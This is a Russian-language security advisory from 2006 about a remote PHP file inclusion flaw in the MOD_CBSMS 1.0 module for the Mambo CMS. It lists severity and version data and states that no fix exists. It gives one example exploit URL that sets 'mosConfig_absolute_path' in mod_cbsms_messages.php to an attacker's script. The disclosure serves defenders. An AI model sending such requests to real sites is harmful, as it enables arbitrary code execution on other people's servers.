PHP-инклюдинг в Mambo MOD_CBSMS модуле

Дата публикации:
29.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
2499
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MOD_CBSMS 1.x (модуль к Mambo)
Уязвимые версии: MOD_CBSMS 1.0 (модуль для Mambo), возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии mod_cbsms_messages.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://www.site.com/[path]/mod_cbsms_messages.php?mosConfig_absolute_path=[evil script]

URL производителя: mamboxchange.com/frs/?group_id=988&release_id=3622

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path]) Remote File Include Vulnerabilities

или введите имя

CAPTCHA